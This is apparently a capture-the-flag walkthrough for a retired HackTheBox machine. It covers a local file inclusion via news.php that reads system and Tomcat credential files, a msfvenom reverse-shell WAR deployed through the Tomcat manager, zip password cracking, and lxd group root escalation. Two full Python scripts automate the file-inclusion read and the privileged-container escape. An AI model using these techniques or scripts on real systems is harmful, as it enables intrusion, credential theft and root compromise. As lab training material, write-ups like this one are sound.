This recently retired machine fits the OSCP-like machines list. It is quite similar to another HTB machine, Jerry, but with a more interesting privilege escalation part.
An Nmap scan with default scripts and version detection shows the following open ports (22, 80 and 8080):
Port 80 HTTP Enumeration
Nikto, gobuster and a few other scans did not turn up much. Visiting the page on port 80, there are some interesting links at the bottom:
One of them takes us to http://megahosting.htb/news.php?file=statement (add megahosting.htb to your hosts file, otherwise the virtual host is not reachable).
A parameter that takes a file name is a candidate for path traversal / local file inclusion, so we try a file that always exists, /etc/passwd, by walking up the directory tree: news.php?file=../../../../etc/passwd
Great! The file comes back and reveals the users on the system: ash
Port 8080 Tomcat Enumeration
Visiting the page on port 8080 takes us to the default Tomcat page of the Ubuntu/Debian package:
So we can see three links here:
- Tomcat docs
- Examples (source code can be viewed and run)
- Admin pages, which are protected by two roles:
  - manager-gui = manager webapp
  - admin-gui = host-manager webapp
The same page gives the layout of the Debian package:
- Default Tomcat home page: /var/lib/tomcat9/webapps/ROOT/index.html
- CATALINA_HOME in /usr/share/tomcat9
- CATALINA_BASE in /var/lib/tomcat9
- Installation notes in /usr/share/doc/tomcat9-common/RUNNING.txt.gz
- Users in /etc/tomcat9/tomcat-users.xml (according to the page; that is not where the copy we can read lives)
- Visiting the manager webapp asks for authentication. When that fails, Tomcat shows the following error page:
It states that users, passwords and roles are defined in the tomcat-users.xml file, and even gives an example entry.
- The host-manager webapp shows the same authentication error.
- Checking the Tomcat docs: the file is $CATALINA_HOME/conf/tomcat-users.xml.
- Based on that and CATALINA_HOME = /usr/share/tomcat9, our file path should be /usr/share/tomcat9/conf/tomcat-users.xml, but the LFI returns nothing for it, and /etc/tomcat9/tomcat-users.xml does not come back either.
After a lot of enumeration and finally a hint, it turns out the Debian package keeps its configuration in an etc/ directory under CATALINA_HOME, so the file we can read is /usr/share/tomcat9/etc/tomcat-users.xml.
Thus the path to include is:
- Capturing the request in Burp and sending it from Repeater with that path returns the file:
- Username: tomcat
Password: $3cureP4s5w0rd123!
Roles: admin-gui, manager-script
These credentials get us into the admin pages, but only partly: the admin-gui role opens the host-manager web app, while the manager web app (manager-gui) stays locked.
- What we want is to upload something, most likely a WAR file. A user with the manager-gui role could upload it through the manager's web form, but we are not that user. What we do have is manager-script, the role for Tomcat's text/script interface under /manager/text, which is what tools like curl and ant use. So we deploy the WAR from the command line instead. Let's check how.
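The part of this that is easy to get wrong is reading roles off the file: a `<user>` that is commented out in the stock tomcat-users.xml is not an account, and which role a user holds decides which endpoint (web form, text interface, host-manager) will accept the credentials. The script below is an added example for this writeup, not the author's code: it pulls a file through the news.php LFI, parses the real `<user>` entries and maps their roles to the endpoints they unlock. The traversal depth of four `../` segments is an assumption, and the sample XML is constructed to mirror the file on the box.

```python
"""Read tomcat-users.xml through the news.php LFI and map each user's roles
to the Tomcat endpoints they unlock.  Added example for this writeup, not
the author's code; the traversal depth is an assumption."""
import re
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

TARGET = "http://megahosting.htb"                      # vhost from the writeup
USERS_XML = "/usr/share/tomcat9/etc/tomcat-users.xml"  # the readable copy

# What each manager/host-manager role unlocks (Tomcat manager-howto docs).
ROLE_ACCESS = {
    "manager-gui": "/manager/html",       # web UI with the WAR upload form
    "manager-script": "/manager/text",    # text interface for curl/ant
    "manager-jmx": "/manager/jmxproxy",
    "manager-status": "/manager/status",
    "admin-gui": "/host-manager/html",
    "admin-script": "/host-manager/text",
}

def lfi_url(base, path, depth=4):
    """news.php?file=../../../../<path>; four levels is assumed to be enough."""
    traversal = "../" * depth + path.lstrip("/")
    return f"{base}/news.php?file={urllib.parse.quote(traversal, safe='/')}"

def fetch_via_lfi(base, path, depth=4, timeout=10):
    """Pull an arbitrary readable file off the box through the LFI (live)."""
    with urllib.request.urlopen(lfi_url(base, path, depth), timeout=timeout) as r:
        return r.read().decode(errors="replace")

def parse_tomcat_users(xml_text):
    """Return {username: {"password": ..., "roles": [...]}} for real <user>
    elements only; commented-out examples in the stock file are dropped by
    the XML parser, so they cannot be mistaken for live accounts."""
    # The stock file declares a default namespace; drop it so tags match.
    cleaned = re.sub(r'\sxmlns="[^"]+"', "", xml_text, count=1)
    root = ET.fromstring(cleaned)
    users = {}
    for u in root.iter("user"):
        roles = [r.strip() for r in u.get("roles", "").split(",") if r.strip()]
        users[u.get("username")] = {"password": u.get("password"), "roles": roles}
    return users

def reachable_endpoints(roles):
    """Endpoints a given role list opens; unknown roles are skipped."""
    return [ROLE_ACCESS[r] for r in roles if r in ROLE_ACCESS]

# Constructed sample with the same structure and roles as the file on the box.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <!-- <user username="admin" password="example" roles="manager-gui"/> -->
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!"
        roles="admin-gui,manager-script"/>
</tomcat-users>
"""

if __name__ == "__main__":
    xml_text = fetch_via_lfi(TARGET, USERS_XML)        # needs the hosts entry
    for name, info in parse_tomcat_users(xml_text).items():
        print(name, info["password"], reachable_endpoints(info["roles"]))
```

Run against the sample, the tomcat user resolves to /host-manager/html and /manager/text only, which is exactly why the manager GUI kept asking for a password while host-manager opened.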
Uploading war file
- Create a reverse-shell payload in WAR format with msfvenom (the java/jsp_shell_reverse_tcp payload with -f war) and start a listener on the chosen port.
- Now send a crafted request to the server: a PUT of the WAR file to the deploy endpoint of the manager text interface, authenticated with the credentials found above. Requesting the deployed JSP afterwards triggers the payload.
It may give an error two or three times, but eventually it gives a shell.
User enumeration completed: we have a shell as tomcat and need ash.
For enumeration I ran linPEAS.sh, which found the file /var/www/html/files/16162020_backup.zip. Trying to unzip it shows that it is password protected.
So we crack it with John the Ripper. Transfer the file to your local machine first (netcat is enough).
Then convert it into a hash john understands with zip2john, writing the output to ash.hashes.
Crack ash.hashes with john and the rockyou wordlist:
The zip password is admin@it, and it is reused as ash's system password, so switching user works with Username: ash, Password: admin@it
ash is a member of the lxd group:
So we can exploit lxd for privilege escalation: anyone in that group can talk to the LXD daemon, which runs as root, and create a privileged container with the host filesystem mounted inside it.
- On your machine: build an Alpine image (for example with lxd-alpine-builder) and copy the resulting tarball to the target.
- On the target machine, in ash's home directory: initialise lxd, import the image, create a privileged container with / mounted inside it, start it and exec a shell. I recommend resetting the machine before doing this, because someone else might already have done the same steps and an image with the same Alpine fingerprint may already exist, which makes the import fail.
Keep all default settings in lxd init, as shown:
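To make the target-side steps above repeatable, and to avoid the fingerprint clash from a previous import, here is an added example script (not the writeup's own commands) that checks the lxd group membership, skips the import when the alias already exists and then runs the lxc commands in order. The image file name, alias, container name and mount point are assumptions.

```python
"""Reproduce the lxd privilege escalation from ash's shell: check the
prerequisites, skip the image import when the alias is already present,
then run the lxc commands in order.  Added example, not the writeup's own
commands; image file, alias, container name and mount point are assumptions."""
import grp
import json
import os
import pwd
import subprocess

IMAGE_FILE = "alpine.tar.gz"   # built with lxd-alpine-builder, copied to ~ash
ALIAS = "alpine"
NAME = "privesc"
MOUNT = "/mnt/root"            # where the host's / appears inside the container

def in_lxd_group(user=None):
    """True when the user is listed as a member of the lxd group."""
    user = user or pwd.getpwuid(os.getuid()).pw_name
    return any(user in g.gr_mem for g in grp.getgrall() if g.gr_name == "lxd")

def aliases_from_list(list_json):
    """Aliases present in the output of `lxc image list --format json`."""
    return {a["name"] for img in json.loads(list_json) for a in img.get("aliases", [])}

def existing_aliases():
    out = subprocess.run(["lxc", "image", "list", "--format", "json"],
                         capture_output=True, text=True, check=True).stdout
    return aliases_from_list(out)

def plan(image_file=IMAGE_FILE, alias=ALIAS, name=NAME, mount=MOUNT, skip_import=False):
    """The lxc command sequence, in order: import, privileged init, mount the
    host root as a disk device, start, shell in."""
    cmds = []
    if not skip_import:
        cmds.append(["lxc", "image", "import", image_file, "--alias", alias])
    cmds += [
        ["lxc", "init", alias, name, "-c", "security.privileged=true"],
        ["lxc", "config", "device", "add", name, "hostroot", "disk",
         "source=/", f"path={mount}", "recursive=true"],
        ["lxc", "start", name],
        ["lxc", "exec", name, "--", "/bin/sh"],
    ]
    return cmds

def escalate():
    if not in_lxd_group():
        raise SystemExit("current user is not in the lxd group")
    # `lxd init` with all defaults must have been run once beforehand.
    cmds = plan(skip_import=ALIAS in existing_aliases())
    for cmd in cmds[:-1]:
        subprocess.run(cmd, check=True)
    os.execvp(cmds[-1][0], cmds[-1])   # hand the terminal to the root shell

if __name__ == "__main__":
    escalate()
```

Inside the container, the host's filesystem sits under /mnt/root, so /mnt/root/root/ and /mnt/root/etc/shadow are readable and writable as root.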
Eureka! We got root: inside the container the host filesystem is mounted, so root's home directory and every other file on the host are readable and writable.